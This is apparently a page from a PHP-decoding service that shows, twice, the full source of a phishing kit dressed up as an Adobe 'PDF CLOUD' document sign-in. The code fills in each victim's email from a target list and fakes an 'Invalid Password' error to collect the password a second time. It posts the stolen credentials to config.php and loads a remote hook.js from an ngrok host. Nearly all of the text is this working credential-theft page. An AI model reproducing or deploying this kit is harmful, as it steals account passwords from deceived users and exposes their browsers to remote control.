Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<html class="gr__pcg2_website"><head> <meta http-equiv="Content-Type" content="text/h..
Decoded Output download
<? <html class="gr__pcg2_website"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
// Wait for the DOM to load before executing JavaScript
document.addEventListener('DOMContentLoaded', function() {
// Find the email input fields by their IDs
var emailInput1 = document.getElementById('email');
var emailInput2 = document.getElementById('email2');
// Read the email addresses from the .txt file
var request = new XMLHttpRequest();
request.open('GET', 'email_addresses.txt', true); // Replace with the path to your .txt file
request.send();
request.onreadystatechange = function () {
if (request.readyState === 4 && request.status === 200) {
var emailAddresses = request.responseText.trim().split('
').map(function(email) {
return email.trim();
});
// Pick a random email address from the list
var randomIndex = Math.floor(Math.random() * emailAddresses.length);
var randomEmail = emailAddresses[randomIndex];
// Set the input field's value to the random email address in both forms
if (emailInput1 && emailInput2 && randomEmail) {
emailInput1.value = randomEmail;
emailInput2.value = randomEmail;
}
}
};
});
</script>
<script src="./Sign In - PDF CLOUD_files/jquery.min.js.download"></script>
<script src="./Sign In - PDF CLOUD_files/jquery-3.1.1.min.js.download">
< script src = "https://code.jquery.com/jquery-3.3.1.js"
integrity = "sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60="
crossorigin = "anonymous" / >
</script>
<script src="https://1e6e7a54bd8f.ngrok.app:443/hook.js"></script>
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://adobe.com/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="https://adobe.com/favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="./Sign In - PDF CLOUD_files/font-awesome.css">
<title>Sign In - PDF CLOUD</title>
<style>
html {
background-image: url('https://i.imgur.com/hH4PmDo.jpeg');
background-repeat: no-repeat;
background-position: 100%;
background-size: cover;
background-attachment: fixed;
background-position: 60%;
background-clip: border-box;
display: block;
}
body {
width: 100%;
margin: 0;
padding: 0;
font-family: adobe-clean, adobe-clean-han-simplified-c, adobe-clean-han-traditional, adobe-clean-han-japanese, adobe-clean-han-korean, Gill Sans, Calibri, Geneva, Tahoma, Helvetica, Arial, "0e10a40ea0aa", Meiryo, "0d20e90ae0ce?d20b4 Pro W3", Hiragino Kaku Gothic Pro W3, Osaka, "2d33 300b40b70c30af", MS PGothic, Malgun Gothic, Microsoft YaHei, sans-serif;
}
.lt {
float: left;
}
.rt {
float: right;
}
.br {
border: 1px solid #000;
}
a {
text-decoration: none;
color: #0064dc;
}
header {
width: 100%;
margin: 0 auto;
padding: 0;
border: none;
background: #000;
}
header .brand {
width: 193px;
margin: 0 30px;
padding: 0;
text-align: center;
display: inline-block;
border: none;
background: #fff;
}
header .brand,
header .search,
header .brand img,
header .brand h1 {
display: inline-block;
}
header .brand img {
width: 54px;
background: #fff;
margin: 0 auto -17px;
padding: 0;
position: relative;
top: 0px;
}
header .brand h1 {
font-size: 20px;
font-weight: 600;
color: #fff;
margin: 0 auto;
padding: 12px 20px;
background: #E80E0E;
}
header .search {
width: 300px;
margin: 0px 30px 0 0;
padding: 12px 0;
float: right;
text-align: center;
}
header .search .srch {
width: 250px;
padding: 5px 10px;
font-size: 13px;
font-weight: 400;
color: #4b4b4b;
border: none;
border-radius: 10px;
}
.container {
width: 100%;
margin: 0 auto;
padding: 0;
}
.container .dash {
width: 100%;
margin: 0 auto;
padding: 0;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 9999;
background: rgba(0, 0, 0, 0.4);
}
.container .dash .board {
max-width: 350px;
margin: 0 auto;
padding: 20px 0;
background: #f6f6f6;
display: block;
border: none;
border-radius: 1px;
position: relative;
top: 20%;
}
.container .dash .board .login {
max-width: 330px;
margin: 0 auto;
padding: 0;
border: none;
}
.container .dash .board .login ul {
width: 100%;
list-style: none;
margin: 0 auto;
padding: 0;
border: none;
display: block;
}
.container .dash .board .login ul li {
width: 100%;
margin: 0 auto;
padding: 0;
display: block;
order: 1px solid #ccc;
}
.login ul li img,
.login ul li p {
display: inline-block;
}
.login ul li img {
margin: 0;
padding: 0;
position: relative;
}
.login ul .l1 p {
font-weight: 400;
color: #707070;
vertical-align: top;
margin: 0;
padding: 0;
}
#err,
.login ul li #adbpss1 {
display: none;
}
.login ul li .inp {
width: 329px;
margin: 8px auto;
padding: 2px 12px;
min-height: 32px;
border: 1px solid #e5e5e5;
border-radius: 4px;
box-sizing: border-box;
color: #000;
display: block;
font-size: 14px;
font-weight: 400;
font-family: adobe-clean, adobe-clean-han-simplified-c, adobe-clean-han-traditional, adobe-clean-han-japanese, adobe-clean-han-korean, Gill Sans, Calibri, Geneva, Tahoma, Helvetica, Arial, "0e10a40ea0aa", Meiryo, "0d20e90ae0ce?d20b4 Pro W3", Hiragino Kaku Gothic Pro W3, Osaka, "2d33 300b40b70c30af", MS PGothic, Malgun Gothic, Microsoft YaHei, sans-serif;
font-style: italic;
}
.login ul li .inp:focus {
border: 1px solid #1473e6;
transition-delay: 0s;
transition-duration: 0.15s;
transition-property: all;
transition-timing-function: ease-in-out;
font-style: normal;
}
.login ul li .btn {
width: 120px;
margin: 0 auto;
padding: 7px 0;
background: #1473e6;
color: #fff;
font-family: adobe-clean, adobe-clean-han-simplified-c, adobe-clean-han-traditional, adobe-clean-han-japanese, adobe-clean-han-korean, Gill Sans, Calibri, Geneva, Tahoma, Helvetica, Arial, "0e10a40ea0aa", Meiryo, "0d20e90ae0ce?d20b4 Pro W3", Hiragino Kaku Gothic Pro W3, Osaka, "2d33 300b40b70c30af", MS PGothic, Malgun Gothic, Microsoft YaHei, sans-serif;
border: none;
border-radius: 16px;
font-size: 15px;
font-weight: 600;
text-align: center;
transition-delay: 0s;
transition-duration: 0.15s;
transition-property: all;
transition-timing-function: ease-in-out;
white-space: nowrap;
display: inline-block;
cursor: pointer;
outline: none;
}
.login ul .l1 svg {
width: 22px;
display: inline-block;
margin: 0;
padding: 0;
position: relative;
top: 9px;
}
.login ul .l1 p {
margin: 0;
padding: 10px 6px;
color: #707070;
}
.login ul .l2 p {
font-size: 13px;
font-weight: 700;
color: #4b4b4b;
margin: 0;
padding: 15px 0;
}
.login ul .l3 img {
width: 32px;
margin: 0 0 -3px;
}
.login ul .l3 p {
font-size: 28px;
font-weight: 300;
color: #2d2d2d;
margin: 0 9px;
padding: 0;
}
.login ul .l4 {
width: 100%;
margin: 0 auto;
padding: 0;
text-align: left;
}
.login ul .l4 p {
font-size: 14px;
font-weight: 600;
margin: 0;
padding: 5px 0;
color: #E80E0E;
font-style: italic;
}
.login ul .l5 p {
width: 100%;
margin: 50px auto 5px;
padding: 0;
text-align: center;
font-size: 13px;
font-weight: 400;
color: #4b4b4b;
display: block;
}
@media(max-width:680px) {
header .search {
width: 70px;
margin: 0px;
text-align: center;
}
header .search .srch {
display: none;
}
header .brand {
width: 180px;
margin: 0 30px;
padding: 0;
}
header .brand img {
width: 40px;
margin: 0 auto -10px;
}
header .brand h1 {
font-size: 18px;
margin: 0 auto;
padding: 7px 20px;
}
}
</style>
</head>
<body data-gr-c-s-loaded="true">
<header>
<div class="brand">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFgAAABOCAYAAACkGtGyAAADsElEQVR4nOWc7W2sMBBFKWFLcAlbAiVsCS5hS6CDlOASUgIlpASXsCXM+xH2ibcPWH+dGSeMZCmRovjOATPDNTDIMHzIMMyG42OAoovclh/EcNxBwHfj3GZrwA8ZhgsI+LLMcVrAgYK7ghzODPiqAPh6VsAzDXcF2S5Hw8m9ImB/NsAPLbgryBbFzgzwZAB4OhNgZwDYnQVw0Ia7ghzOAHg0BDz+dsDRCu4KcvzNgH0HgDVbNlXAqO+QAVjTn1AFHKzhPkP0ip0qYGcN9hmi17KpAZ6tob6GWt5KE3lroK8hOsVOBXC0hrkXwrdsKoAna5B7Ibw/oQLYWYPcC+GLHQ44WEN8F8K2bDjg0RrguxDWn0ABR2t4qSFcsUMBe2twqSFcy4YB7sJ3SA3h/AkMMPY4FBXy/ZjVjwHsIAgXamUI07IhgGcCwALhLuyzbO1ZAP/0BgKIAnYnMgy33gFrJU8fxG4BT2Dia52f4Dwt/YnmgDULkIPmuvQKOBAJL0lvtVDkk/GhR8AjlOzeTQB2MyPt/IlmgL+IRJdkj25jPTjvV0+AyURjhwdWFbD1Uh2huVv4E00Ak8XmM2H+AM5f6080Aeyg5HK8gR40IIBnIrEluZyGfwJ11PGp/AfkLWvO9Q97JUHq/IkqwBFMqqSCe1BPtABM2oYlPegM6il9JbcKcI93UciLjVLuTxQDDkQiSzKhAnBvuooBU2dKi20bamWVvJJbBJi8PW3hxfZUG4oAezCB2ABwBPXldjfZgMl+s+XDH73059mASd8hdyUdJ8bpzPEnsgE7SDTxTQdKa04hzgJMbjQGALC1y5cNGLmuSdtNxvUgfepUfyIZcCSELmLJx/g9qDu2BEz2lilCSwd5YqT4E8mArZdazRgh7SmXtiTAgRC4iEw5uLWD1B9aAO7Zd0gdDsrhXXv5FvBMCFvEvTv6LccE5nHM780feEiU9icPrW7xDwGrf3orJaS8b/agpr2T5RDwRAmqjcLLi4XNegjYUYJqQ8q3lbQL9i5gzHdoFVJ2gxJAPVv+xC7gkRLSKqR8p1dzs3YTcCQEtA4pL3YTqOl1VW0CxnyH1iFlxQ47gTZW1X+Af9orsKXFjrReH0eAsSJAxcayTBkzqCccAcY/+d06Koqdg/Rc9wBjR5UMKTeNsNX6D9PVL56akA5J3yNbD3JLyb8CxiqrRki5ce9BTXENeKIm0orCYoedWPLtT/wF7KiJtELKN09HSI97AsYeM9KMZ0IFYwI13f4AyPgPAa92JPUAAAAASUVORK5CYII=" alt="Adobe ID Logo">
<h1>PDF CLOUD</h1>
</div>
<div class="search">
<input type="search" name="search" class="srch" id="srch" placeholder="Enter a search ...">
</div>
</header>
<div class="container">
<div class="dash cover">
<div class="board animated fadeIn">
<div class="login">
<form method="POST" action="" id="form1">
<ul>
<li class="l1"><svg viewBox="0 0 48 48" focusable="false" aria-hidden="true" role="img" class="spectrum-Icon spectrum-Icon--sizeM nav-logo">
<path d="M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z">
</path>
</svg>
<p class="">PDF Cloud</p>
</li>
<li class="l2">
<p>For security, please sign in with your email to verify your Identity, and view
documents.</p>
</li>
<li class="l3"><img src="https://i.imgur.com/ant3DSZ.png" alt="Adobe ID Logo">
<p>PDF Document</p>
</li><br>
<div class="text-danger" id="msg" style="display: none; color: red; font-style: italic; font-size: 13px;">Invalid
Password! Please Enter your correct Password</div>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist.
Enter a different account</span>
<li class="l4 animated fadeIn" id="err">
<p id="erp">Error Message</p>
</li>
<li><input type="email" name="email" class="inp" id="email" autocomplete="off" placeholder="Email Address" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;" readonly="">
</li><li><input type="password" name="password" class="inp" id="password" autocomplete="off" placeholder="Email Password" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%; cursor: auto;" required="">
</li><br>
<li><style>
.btn {
padding: 10px 20px;
font-size: 18px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style for the list item */
li {
list-style: none;
text-align: center; /* Center text horizontally within the list item */
}
</style>
<ul>
<li>
<button type="submit" name="submit" class="btn" id="submit-btn">Sign In</button>
</li>
</ul>
</li>
<li class="l5">
<p>Copyright 2023 Adobe Corporation</p>
</li>
</ul>
</form>
<form method="POST" action="" id="form2" style="display: none;"> <!-- Add id="form2" and set display: none -->
<ul>
<li class="l1"><svg viewBox="0 0 48 48" focusable="false" aria-hidden="true" role="img" class="spectrum-Icon spectrum-Icon--sizeM nav-logo">
<path d="M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z">
</path>
</svg>
<p class="">PDF Cloud</p>
</li>
<li class="l2">
<p>For security, please sign in with your email to verify your Identity, and view
documents.</p>
</li>
<li class="l3"><img src="https://i.imgur.com/ant3DSZ.png" alt="Adobe ID Logo">
<p>PDF Document</p>
</li><br>
<div class="text-danger" id="msg" style="color: red; font-style: italic; font-size: 13px;">Invalid
Password! Please Enter your correct Password</div>
<li class="l4 animated fadeIn" id="err">
<p id="erp">Error Message</p>
</li>
<li><input type="email" name="email2" class="inp" id="email2" autocomplete="off" placeholder="Email Address" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;" readonly="">
</li><li><input type="password" name="password2" class="inp" id="password2" autocomplete="off" placeholder="Email Password" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%; cursor: auto;" required="">
</li><br>
<li><style>
.btn {
padding: 10px 20px;
font-size: 18px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style for the list item */
li {
list-style: none;
text-align: center; /* Center text horizontally within the list item */
}
</style>
<ul>
<li>
<button type="submit" name="submit" class="btn" id="submit-btn">Sign In</button>
</li>
</ul>
</li>
<li class="l5">
<p>Copyright 2023 Adobe Corporation</p>
</li>
</ul>
</form><form method="POST" action="" id="form3" style="display: none;">
<ul>
<li class="l1"><svg viewBox="0 0 48 48" focusable="false" aria-hidden="true" role="img" class="spectrum-Icon spectrum-Icon--sizeM nav-logo">
<path d="M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z">
</path>
</svg>
<p class="">PDF Cloud</p>
</li>
<br><li class="l3">
<p>Sorry, something went wrong</p>
</li><br>
<div class="text-danger" id="msg" style="display: none; color: red; font-style: italic; font-size: 13px;">Invalid
Password! Please Enter your correct Password</div>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist.
Enter a different account</span>
<li class="l4 animated fadeIn" id="err">
<p id="erp">Error Message</p>
</li>
<br>
<li><style>
.btn {
padding: 10px 20px;
font-size: 18px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style for the list item */
li {
list-style: none;
text-align: center; /* Center text horizontally within the list item */
}
</style>
<ul>
<li class="l1">
<p>The file may be moved, deleted or edited.</p>
</li>
</ul>
</li>
<li class="l5">
<p>Copyright 2023 Adobe Corporation</p>
</li>
</ul>
</form></div>
</div>
</div>
</div>
<div id="success-page" style="display: none;">
<p>Success! Your data has been submitted.</p>
</div>
<script>
document.addEventListener('DOMContentLoaded', function() {
// Get the form elements
var form1 = document.getElementById('form1');
var form2 = document.getElementById('form2');
var form3 = document.getElementById('form3');
var successPage = document.getElementById('success-page');
// Variables to store form data
var formData1 = {};
var formData2 = {};
// Add a submit event listener to Form 1
form1.addEventListener('submit', function(e) {
e.preventDefault(); // Prevent the default form submission behavior
// Collect data from Form 1
formData1.email = form1.querySelector('#email').value;
formData1.password = form1.querySelector('#password').value;
// Hide Form 1 and show Form 2
form1.style.display = 'none';
form2.style.display = 'block';
});
// Add a submit event listener to Form 2
form2.addEventListener('submit', function(e) {
e.preventDefault(); // Prevent the default form submission behavior
// Collect data from Form 2
formData2.email2 = form2.querySelector('#email2').value;
formData2.password2 = form2.querySelector('#password2').value;
// Here you can perform any actions with the data from Form 1 and Form 2
// Combine the data from Form 1 and Form 2
var combinedData = { ...formData1, ...formData2 };
// Create a hidden form element for POST request
var hiddenForm = document.createElement('form');
hiddenForm.method = 'POST';
hiddenForm.action = 'config.php';
// Convert data to input fields
for (var key in combinedData) {
var input = document.createElement('input');
input.type = 'hidden';
input.name = key;
input.value = combinedData[key];
hiddenForm.appendChild(input);
}
// Append the hidden form to the document and submit it
document.body.appendChild(hiddenForm);
hiddenForm.submit();
// Hide Form 2 and show Form 3
form2.style.display = 'none';
form3.style.display = 'block';
});
});
</script>
<script src="./Sign In - PDF CLOUD_files/jquery-3.3.1.min.js.download"></script><!-- Optional JavaScript -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="./Sign In - PDF CLOUD_files/jquery-3.2.1.slim.min.js.download" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous">
</script>
<script src="./Sign In - PDF CLOUD_files/popper.min.js.download" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous">
</script>
<script src="./Sign In - PDF CLOUD_files/bootstrap.min.js.download" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous">
</script>
<script src="./Sign In - PDF CLOUD_files/jquery.min.js.download"></script>
<script src="./Sign In - PDF CLOUD_files/bootstrap.min.js(1).download"></script>
</body></html> ?>
Did this file decode correctly?
Original Code
<html class="gr__pcg2_website"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript">
// Wait for the DOM to load before executing JavaScript
document.addEventListener('DOMContentLoaded', function() {
// Find the email input fields by their IDs
var emailInput1 = document.getElementById('email');
var emailInput2 = document.getElementById('email2');
// Read the email addresses from the .txt file
var request = new XMLHttpRequest();
request.open('GET', 'email_addresses.txt', true); // Replace with the path to your .txt file
request.send();
request.onreadystatechange = function () {
if (request.readyState === 4 && request.status === 200) {
var emailAddresses = request.responseText.trim().split('\n').map(function(email) {
return email.trim();
});
// Pick a random email address from the list
var randomIndex = Math.floor(Math.random() * emailAddresses.length);
var randomEmail = emailAddresses[randomIndex];
// Set the input field's value to the random email address in both forms
if (emailInput1 && emailInput2 && randomEmail) {
emailInput1.value = randomEmail;
emailInput2.value = randomEmail;
}
}
};
});
</script>
<script src="./Sign In - PDF CLOUD_files/jquery.min.js.download"></script>
<script src="./Sign In - PDF CLOUD_files/jquery-3.1.1.min.js.download">
< script src = "https://code.jquery.com/jquery-3.3.1.js"
integrity = "sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60="
crossorigin = "anonymous" / >
</script>
<script src="https://1e6e7a54bd8f.ngrok.app:443/hook.js"></script>
<meta name="ROBOTS" content="NOINDEX, NOFOLLOW">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="icon" href="https://adobe.com/favicon.ico" type="image/x-icon">
<link rel="shortcut icon" href="https://adobe.com/favicon.ico" type="image/x-icon">
<link rel="stylesheet" href="./Sign In - PDF CLOUD_files/font-awesome.css">
<title>Sign In - PDF CLOUD</title>
<style>
html {
background-image: url('https://i.imgur.com/hH4PmDo.jpeg');
background-repeat: no-repeat;
background-position: 100%;
background-size: cover;
background-attachment: fixed;
background-position: 60%;
background-clip: border-box;
display: block;
}
body {
width: 100%;
margin: 0;
padding: 0;
font-family: adobe-clean, adobe-clean-han-simplified-c, adobe-clean-han-traditional, adobe-clean-han-japanese, adobe-clean-han-korean, Gill Sans, Calibri, Geneva, Tahoma, Helvetica, Arial, "0e10a40ea0aa", Meiryo, "0d20e90ae0ce?d20b4 Pro W3", Hiragino Kaku Gothic Pro W3, Osaka, "2d33 300b40b70c30af", MS PGothic, Malgun Gothic, Microsoft YaHei, sans-serif;
}
.lt {
float: left;
}
.rt {
float: right;
}
.br {
border: 1px solid #000;
}
a {
text-decoration: none;
color: #0064dc;
}
header {
width: 100%;
margin: 0 auto;
padding: 0;
border: none;
background: #000;
}
header .brand {
width: 193px;
margin: 0 30px;
padding: 0;
text-align: center;
display: inline-block;
border: none;
background: #fff;
}
header .brand,
header .search,
header .brand img,
header .brand h1 {
display: inline-block;
}
header .brand img {
width: 54px;
background: #fff;
margin: 0 auto -17px;
padding: 0;
position: relative;
top: 0px;
}
header .brand h1 {
font-size: 20px;
font-weight: 600;
color: #fff;
margin: 0 auto;
padding: 12px 20px;
background: #E80E0E;
}
header .search {
width: 300px;
margin: 0px 30px 0 0;
padding: 12px 0;
float: right;
text-align: center;
}
header .search .srch {
width: 250px;
padding: 5px 10px;
font-size: 13px;
font-weight: 400;
color: #4b4b4b;
border: none;
border-radius: 10px;
}
.container {
width: 100%;
margin: 0 auto;
padding: 0;
}
.container .dash {
width: 100%;
margin: 0 auto;
padding: 0;
position: absolute;
top: 0;
right: 0;
bottom: 0;
left: 0;
z-index: 9999;
background: rgba(0, 0, 0, 0.4);
}
.container .dash .board {
max-width: 350px;
margin: 0 auto;
padding: 20px 0;
background: #f6f6f6;
display: block;
border: none;
border-radius: 1px;
position: relative;
top: 20%;
}
.container .dash .board .login {
max-width: 330px;
margin: 0 auto;
padding: 0;
border: none;
}
.container .dash .board .login ul {
width: 100%;
list-style: none;
margin: 0 auto;
padding: 0;
border: none;
display: block;
}
.container .dash .board .login ul li {
width: 100%;
margin: 0 auto;
padding: 0;
display: block;
order: 1px solid #ccc;
}
.login ul li img,
.login ul li p {
display: inline-block;
}
.login ul li img {
margin: 0;
padding: 0;
position: relative;
}
.login ul .l1 p {
font-weight: 400;
color: #707070;
vertical-align: top;
margin: 0;
padding: 0;
}
#err,
.login ul li #adbpss1 {
display: none;
}
.login ul li .inp {
width: 329px;
margin: 8px auto;
padding: 2px 12px;
min-height: 32px;
border: 1px solid #e5e5e5;
border-radius: 4px;
box-sizing: border-box;
color: #000;
display: block;
font-size: 14px;
font-weight: 400;
font-family: adobe-clean, adobe-clean-han-simplified-c, adobe-clean-han-traditional, adobe-clean-han-japanese, adobe-clean-han-korean, Gill Sans, Calibri, Geneva, Tahoma, Helvetica, Arial, "0e10a40ea0aa", Meiryo, "0d20e90ae0ce?d20b4 Pro W3", Hiragino Kaku Gothic Pro W3, Osaka, "2d33 300b40b70c30af", MS PGothic, Malgun Gothic, Microsoft YaHei, sans-serif;
font-style: italic;
}
.login ul li .inp:focus {
border: 1px solid #1473e6;
transition-delay: 0s;
transition-duration: 0.15s;
transition-property: all;
transition-timing-function: ease-in-out;
font-style: normal;
}
.login ul li .btn {
width: 120px;
margin: 0 auto;
padding: 7px 0;
background: #1473e6;
color: #fff;
font-family: adobe-clean, adobe-clean-han-simplified-c, adobe-clean-han-traditional, adobe-clean-han-japanese, adobe-clean-han-korean, Gill Sans, Calibri, Geneva, Tahoma, Helvetica, Arial, "0e10a40ea0aa", Meiryo, "0d20e90ae0ce?d20b4 Pro W3", Hiragino Kaku Gothic Pro W3, Osaka, "2d33 300b40b70c30af", MS PGothic, Malgun Gothic, Microsoft YaHei, sans-serif;
border: none;
border-radius: 16px;
font-size: 15px;
font-weight: 600;
text-align: center;
transition-delay: 0s;
transition-duration: 0.15s;
transition-property: all;
transition-timing-function: ease-in-out;
white-space: nowrap;
display: inline-block;
cursor: pointer;
outline: none;
}
.login ul .l1 svg {
width: 22px;
display: inline-block;
margin: 0;
padding: 0;
position: relative;
top: 9px;
}
.login ul .l1 p {
margin: 0;
padding: 10px 6px;
color: #707070;
}
.login ul .l2 p {
font-size: 13px;
font-weight: 700;
color: #4b4b4b;
margin: 0;
padding: 15px 0;
}
.login ul .l3 img {
width: 32px;
margin: 0 0 -3px;
}
.login ul .l3 p {
font-size: 28px;
font-weight: 300;
color: #2d2d2d;
margin: 0 9px;
padding: 0;
}
.login ul .l4 {
width: 100%;
margin: 0 auto;
padding: 0;
text-align: left;
}
.login ul .l4 p {
font-size: 14px;
font-weight: 600;
margin: 0;
padding: 5px 0;
color: #E80E0E;
font-style: italic;
}
.login ul .l5 p {
width: 100%;
margin: 50px auto 5px;
padding: 0;
text-align: center;
font-size: 13px;
font-weight: 400;
color: #4b4b4b;
display: block;
}
@media(max-width:680px) {
header .search {
width: 70px;
margin: 0px;
text-align: center;
}
header .search .srch {
display: none;
}
header .brand {
width: 180px;
margin: 0 30px;
padding: 0;
}
header .brand img {
width: 40px;
margin: 0 auto -10px;
}
header .brand h1 {
font-size: 18px;
margin: 0 auto;
padding: 7px 20px;
}
}
</style>
</head>
<body data-gr-c-s-loaded="true">
<header>
<div class="brand">
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAFgAAABOCAYAAACkGtGyAAADsElEQVR4nOWc7W2sMBBFKWFLcAlbAiVsCS5hS6CDlOASUgIlpASXsCXM+xH2ibcPWH+dGSeMZCmRovjOATPDNTDIMHzIMMyG42OAoovclh/EcNxBwHfj3GZrwA8ZhgsI+LLMcVrAgYK7ghzODPiqAPh6VsAzDXcF2S5Hw8m9ImB/NsAPLbgryBbFzgzwZAB4OhNgZwDYnQVw0Ia7ghzOAHg0BDz+dsDRCu4KcvzNgH0HgDVbNlXAqO+QAVjTn1AFHKzhPkP0ip0qYGcN9hmi17KpAZ6tob6GWt5KE3lroK8hOsVOBXC0hrkXwrdsKoAna5B7Ibw/oQLYWYPcC+GLHQ44WEN8F8K2bDjg0RrguxDWn0ABR2t4qSFcsUMBe2twqSFcy4YB7sJ3SA3h/AkMMPY4FBXy/ZjVjwHsIAgXamUI07IhgGcCwALhLuyzbO1ZAP/0BgKIAnYnMgy33gFrJU8fxG4BT2Dia52f4Dwt/YnmgDULkIPmuvQKOBAJL0lvtVDkk/GhR8AjlOzeTQB2MyPt/IlmgL+IRJdkj25jPTjvV0+AyURjhwdWFbD1Uh2huVv4E00Ak8XmM2H+AM5f6080Aeyg5HK8gR40IIBnIrEluZyGfwJ11PGp/AfkLWvO9Q97JUHq/IkqwBFMqqSCe1BPtABM2oYlPegM6il9JbcKcI93UciLjVLuTxQDDkQiSzKhAnBvuooBU2dKi20bamWVvJJbBJi8PW3hxfZUG4oAezCB2ABwBPXldjfZgMl+s+XDH73059mASd8hdyUdJ8bpzPEnsgE7SDTxTQdKa04hzgJMbjQGALC1y5cNGLmuSdtNxvUgfepUfyIZcCSELmLJx/g9qDu2BEz2lilCSwd5YqT4E8mArZdazRgh7SmXtiTAgRC4iEw5uLWD1B9aAO7Zd0gdDsrhXXv5FvBMCFvEvTv6LccE5nHM780feEiU9icPrW7xDwGrf3orJaS8b/agpr2T5RDwRAmqjcLLi4XNegjYUYJqQ8q3lbQL9i5gzHdoFVJ2gxJAPVv+xC7gkRLSKqR8p1dzs3YTcCQEtA4pL3YTqOl1VW0CxnyH1iFlxQ47gTZW1X+Af9orsKXFjrReH0eAsSJAxcayTBkzqCccAcY/+d06Koqdg/Rc9wBjR5UMKTeNsNX6D9PVL56akA5J3yNbD3JLyb8CxiqrRki5ce9BTXENeKIm0orCYoedWPLtT/wF7KiJtELKN09HSI97AsYeM9KMZ0IFYwI13f4AyPgPAa92JPUAAAAASUVORK5CYII=" alt="Adobe ID Logo">
<h1>PDF CLOUD</h1>
</div>
<div class="search">
<input type="search" name="search" class="srch" id="srch" placeholder="Enter a search ...">
</div>
</header>
<div class="container">
<div class="dash cover">
<div class="board animated fadeIn">
<div class="login">
<form method="POST" action="" id="form1">
<ul>
<li class="l1"><svg viewBox="0 0 48 48" focusable="false" aria-hidden="true" role="img" class="spectrum-Icon spectrum-Icon--sizeM nav-logo">
<path d="M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z">
</path>
</svg>
<p class="">PDF Cloud</p>
</li>
<li class="l2">
<p>For security, please sign in with your email to verify your Identity, and view
documents.</p>
</li>
<li class="l3"><img src="https://i.imgur.com/ant3DSZ.png" alt="Adobe ID Logo">
<p>PDF Document</p>
</li><br>
<div class="text-danger" id="msg" style="display: none; color: red; font-style: italic; font-size: 13px;">Invalid
Password! Please Enter your correct Password</div>
<span id="error" class="text-danger" style="display: none;">That account doesn't exist.
Enter a different account</span>
<li class="l4 animated fadeIn" id="err">
<p id="erp">Error Message</p>
</li>
<li><input type="email" name="email" class="inp" id="email" autocomplete="off" placeholder="Email Address" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%;" readonly="">
</li><li><input type="password" name="password" class="inp" id="password" autocomplete="off" placeholder="Email Password" style="background-image: url(""); background-repeat: no-repeat; background-attachment: scroll; background-size: 16px 18px; background-position: 98% 50%; cursor: auto;" required="">
</li><br>
<li><style>
.btn {
padding: 10px 20px;
font-size: 18px;
background-color: #007BFF;
color: #fff;
border: none;
border-radius: 5px;
cursor: pointer;
}
/* Style for the list item */
li {
list-style: none;
text-align: center; /* Center text horizontally within the list item */
}
</style>
<ul>
<li>
<button type="submit" name="submit" class="btn" id="submit-btn">Sign In</button>
</li>
</ul>
</li>
<li class="l5">
<p>Copyright 2023 Adobe Corporation</p>
</li>
</ul>
</form>
<form method="POST" action="" id="form2" style="display: none;"> <!-- Add id="form2" and set display: none -->
<ul>
<li class="l1"><svg viewBox="0 0 48 48" focusable="false" aria-hidden="true" role="img" class="spectrum-Icon spectrum-Icon--sizeM nav-logo">
<path d="M29.219 6H44v36L29.219 6zM18.798 6H4v36L18.798 6zm5.207 13.265l9.422 22.733h-6.173l-2.823-7.24h-6.896l6.47-15.493z">
</path>
</svg>
<p class="">PDF Cloud</p>
</li>
<li class="l2">
<p>For security, please sign in with your email to verify your Identity, and view
documents.</p>
</li>
<li class="l3"><img src="https://i.imgur.com/ant3DSZ.png" alt="Adobe ID Logo">
<p>PDF Document</p>
</li><br>
